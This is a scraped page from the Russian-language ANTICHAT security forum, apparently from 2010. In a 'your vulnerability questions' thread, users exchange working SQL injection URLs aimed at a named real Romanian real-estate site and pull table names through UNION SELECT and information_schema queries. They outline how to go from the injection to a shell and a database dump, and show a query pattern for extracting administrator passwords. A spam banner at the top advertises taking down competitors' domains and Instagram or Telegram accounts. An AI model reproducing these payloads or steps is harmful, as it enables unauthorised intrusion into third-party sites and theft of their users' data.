УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1406 из 2438

1406

Опции темы

Поиск в этой теме

Опции просмотра

#14051

25.06.2010, 22:53

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от 547

547 said:
can'not get tables....

Код:

Code:
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,unhex%28hex%28group_concat%28table_name%29%29%29,4,5,6,7,8,9+from+information_schema.tables--

http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,3,4,5,GrOuP_CoNcAt(TaBlE_NaMe ),7,8,9+from+information_schema.columns--

вывод в title

#14052

25.06.2010, 23:02

Алкорайдер

Новичок

Регистрация: 03.06.2009

Сообщений: 10

Провел на форуме:
178004

Репутация: 0

Подскажите плз как слить бд

#14053

25.06.2010, 23:04

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от Алкорайдер

Алкорайдер said:
Подскажите плз как слить бд

тебя посадят

а может скажешь что есть под рукой? шелл/админка/ и тп..или ничего? )

#14054

25.06.2010, 23:07

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

Цитата:

Сообщение от Konqi

Konqi said:
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,3,4,5,GrOuP_CoNcAt(TaBlE_NaMe ),7,8,9+from+information_schema.columns--
вывод в title

вообщет ето не таблички...

title необязательно,так удобнее..

спс.

http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,GrOuP_CoNcAt%28TaBlE_NaMe%20% 29,4,5,6,7,8,9+from+information_schema.tables--

#14055

25.06.2010, 23:11

Алкорайдер

Новичок

Регистрация: 03.06.2009

Сообщений: 10

Провел на форуме:
178004

Репутация: 0

Цитата:

Сообщение от Konqi

Konqi said:
тебя посадят
а может скажешь что есть под рукой? шелл/админка/ и тп..или ничего? )

Врятли

Ничего, только sql-inj, но какбы там база огромная, поэтому хочу как-нибудь слить бд

#14056

25.06.2010, 23:12

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от 547

547 said:
вообщет ето не таблички...
title необязательно,так удобнее..
спс.
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,GrOuP_CoNcAt%28TaBlE_NaMe%20% 29,4,5,6,7,8,9+from+information_schema.tables--

man я просто подумал что там фильтр на information_schema.tables поэтому сделал выборку из columns

#14057

25.06.2010, 23:15

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от Алкорайдер

Алкорайдер said:
Врятли
Ничего, только sql-inj, но какбы там база огромная, поэтому хочу как-нибудь слить бд

инъекция->админка->shell->дамп

или

инъекция->shell->дамп

#14058

25.06.2010, 23:23

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

Цитата:

Сообщение от Konqi

Konqi said:
инъекция->админка->shell->дамп
или
инъекция->shell->дамп

инъекция->дамп (долго но можно=) )

#14059

25.06.2010, 23:31

Алкорайдер

Новичок

Регистрация: 03.06.2009

Сообщений: 10

Провел на форуме:
178004

Репутация: 0

Я немного не правильно выразился

Почти 1к БД, нужно как-то это всё слить и разобраться где там таблица с админскими пассами, т.к через inject там шелл не получается залить

вот примерно так всё это выглядит, половина БД пустые

#14060

26.06.2010, 00:42

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от Алкорайдер

Алкорайдер said:
Я немного не правильно выразился
Почти 1к БД, нужно как-то это всё слить и разобраться где там таблица с админскими пассами, т.к через inject там шелл не получается залить
вот
примерно так всё это выглядит, половина БД пустые

сделай запрос на вывод по другому..если админы в той же табелке что и обычные юзвери они отличаются статусом, левелом .попробуй что то типа : www.site.ru/news.php?id=[sql]+union+select+1,2,3,password+from+users+where+user _level=1--

ну или что то наподобее этого, все зависит от данных в твоей табличке с аккаунтами

Страница 1406 из 2438

1406

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход